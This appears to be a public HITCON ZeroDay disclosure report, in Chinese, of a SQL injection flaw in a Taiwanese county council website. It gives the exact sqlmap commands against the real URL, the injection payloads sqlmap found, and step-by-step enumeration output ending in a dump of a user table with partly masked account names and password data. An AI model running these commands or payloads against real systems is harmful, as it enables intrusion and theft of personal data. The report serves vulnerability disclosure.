Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2024-00630
- 發信 Vendor: 澎湖縣議會
- Title: phcouncil網站有SQL Injection漏洞
- Introduction: 某機關網站有SQL Injection漏洞
處理狀態
目前狀態
公開
Last Update : 2024/08/02
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2024/06/02 19:33:40 : 新提交 (由 ChaosFractal 更新此狀態)
- 2024/06/02 19:40:15 : 新提交 (由 ChaosFractal 更新此狀態)
- 2024/06/02 19:49:10 : 新提交 (由 ChaosFractal 更新此狀態)
- 2024/06/02 19:49:38 : 新提交 (由 ChaosFractal 更新此狀態)
- 2024/06/02 19:50:07 : 新提交 (由 ChaosFractal 更新此狀態)
- 2024/06/06 14:57:10 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/06/12 18:29:23 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/06/12 18:29:23 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/08/02 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2024-00630
- 通報者:ChaosFractal (ChaosFractal)
- 風險:嚴重
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://www.phcouncil.gov.tw/show/board.php?no=B06050001
敘述
漏洞種類:SQL Injection
重現漏洞方式:
使用SQLMAP工具進行測試
1.簡易測試發現有SQL Injection
語法:
> sqlmap -u "http://www.phcouncil.gov.tw/show/board.php?no=B06050001"結果:
[10:30:05] [INFO] resuming back-end DBMS 'mysql'
[10:30:05] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: no (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: no=B06050001' AND 2308=2308 AND 'uWGU'='uWGU
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: no=B06050001' AND (SELECT 6523 FROM(SELECT COUNT(*),CONCAT(0x716b706b71,(SELECT (ELT(6523=6523,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'enHZ'='enHZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: no=B06050001' AND (SELECT 1494 FROM (SELECT(SLEEP(5)))bMjD) AND 'XrRi'='XrRi
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: no=-3934' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b706b71,0x7972676d444158626f685669654a6b79617668787561555376794c777675636d636b4e4344797644,0x716b706a71),NULL#
---
[10:30:06] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0 (MariaDB fork)2.嘗試取得資料庫清單,發現資料庫phcouncil
語法:
> sqlmap -u "http://www.phcouncil.gov.tw/show/board.php?no=B06050001" --dbms=mysql --technique=BETU --level=5 --risk=2 --batch --random-agent --tamper=space2comment,space2hash --dbs結果:
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phcouncil
[*] phpmyadmin
[*] test3.嘗試取得資料庫phcouncil有哪些資料表
語法:
> sqlmap -u "http://www.phcouncil.gov.tw/show/board.php?no=B06050001" --dbms=mysql --technique=BETU --level=5 --risk=2 --batch --random-agent --tamper=space2comment,space2hash --dbs --fingerprint -D "phcouncil" --tables結果:
Database: phcouncil
[37 tables]
+-------------------+
| system_user |
| cdb_activity1 |
| cdb_activity2 |
| cdb_board |
| cdb_bulletin |
| cdb_chairman |
| cdb_councildata1 |
| cdb_councildata2 |
| cdb_councilgov |
| cdb_countygov |
| cdb_form |
| cdb_forum_data |
| cdb_forum_reply |
| cdb_history |
| cdb_law |
| cdb_law_title |
| cdb_meet |
| cdb_meet_title |
| cdb_message |
| cdb_message2 |
| cdb_mop |
| cdb_newlawdyn1 |
| cdb_newlawdyn2 |
| cdb_petition |
| cdb_phdata1 |
| cdb_phdata2 |
| cdb_provisional |
| cdb_record1 |
| cdb_record2 |
| cdb_schedule |
| cdb_video |
| cdb_website |
| system_autonum |
| system_department |
| system_menu |
| system_parameter |
| system_session |
+-------------------+4.嘗試取得資料表system_user欄位
語法:
❯ sqlmap -u "http://www.phcouncil.gov.tw/show/board.php?no=B06050001" --dbms=mysql --technique=BETU --level=5 --risk=2 --batch --random-agent --tamper=space2comment,space2hash --dbs --fingerprint -D "phcouncil" --T "system_user" --columns結果:
Database: phcouncil
Table: system_user
[7 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| user | varchar(16) |
| ann_permit | tinyint(4) |
| department | int(11) |
| fullname | varchar(20) |
| memo | text |
| password | blob |
| permit | text |
+------------+-------------+5.嘗試取得資料表system_user內容
語法:
❯ sqlmap -u "http://www.phcouncil.gov.tw/show/board.php?no=B06050001" --dbms=mysql --technique=BETU --level=5 --risk=2 --batch --random-agent --tamper=space2comment,space2hash --dbs --fingerprint -D "phcouncil" -T "system_user" --dump`結果:
Database: phcouncil
Table: system_user
[7 entries]
+---------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+------------------------------+------------+------------+
| memo | user | permit | fullname | password | ann_permit | department |
+---------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+------------------------------+------------+------------+
| <blank> | l****i | 1,0,2,1,3,1,4,1,5,1,37,0,8,0,34,8,35,8,36,8,9,0,10,0,11,0,12,0,17,12,13,0,16,13,14,0,15,0,19,0,38,0,22,0,23,0,24,0,25,24,26,24,29,24,30,24,31,0,32,0,33,0,39,0,40,0 | 系O員 | ??bZٖ**********?7x | 1 | 9 |
| <blank> | x1****2 | 1,0,2,1,3,1,4,1,5,1,37,0,8,0,34,8,35,8,36,8,9,0,10,0,11,0,12,0,17,12,13,0,16,13,14,0,15,0,19,0,38,0,22,0,23,0,24,0,25,24,26,24,29,24,30,24,31,0,32,0,33,0,39,0,40,0 | 啟O員 | ??**********?W( | 0 | 9 |
| <blank> | c****u | 1,0,2,1,3,1,4,1,5,1,37,0,8,0,34,8,35,8,36,8,9,0,10,0,11,0,12,0,17,12,13,0,16,13,14,0,15,0,19,0,22,0,23,0,38,0,24,0,25,24,26,24,29,24,30,24,31,0,32,0,33,0,39,40 | 系O者 | ????**********1?? | 0 | 9 |
| <blank> | x1****3 | 37,0,10,0,10,11,0,12,0,17,12,22,0,23,0 | 莊O州 | ?\\I**********eC? | 0 | 4 |
| <blank> | X1****77 | 1,0,2,1,3,1,4,1,5,1,37,0,8,0,36,8,9,0,10,0,11,0,12,0,17,12,13,0,16,13,14,0,15,0,19,0,22,0,23,0,38,0,24,0,25,24,26,24,29,24,30,24,31,0,32,0,33,0 | 楊O銘 | 54?u**********?J? | 0 | 1 |
| <blank> | su****13 | 1,0,11,0 | 陳O珊 | ??wK\*************3~? | 0 | 5 |
| <blank> | we****5 | 1,0,2,1,3,1,4,1,5,1,37,0,8,0,34,8,35,8,36,8,9,0,10,0,11,0,12,0,17,12,13,0,16,13,14,0,15,0,19,0,38,0,22,0,23,0,24,0,25,24,26,24,29,24,30,24,31,0,32,0,33,0,39,0,40,0 | 王O衛 | 4}?**********\x14 | 1 | 9 |
+---------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+------------------------------+------------+------------+影響說明:
機密性受到衝擊,整個資料庫被看光光
若駭客有心嘗試編輯的話,完整性與可用性都有可能受衝擊
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。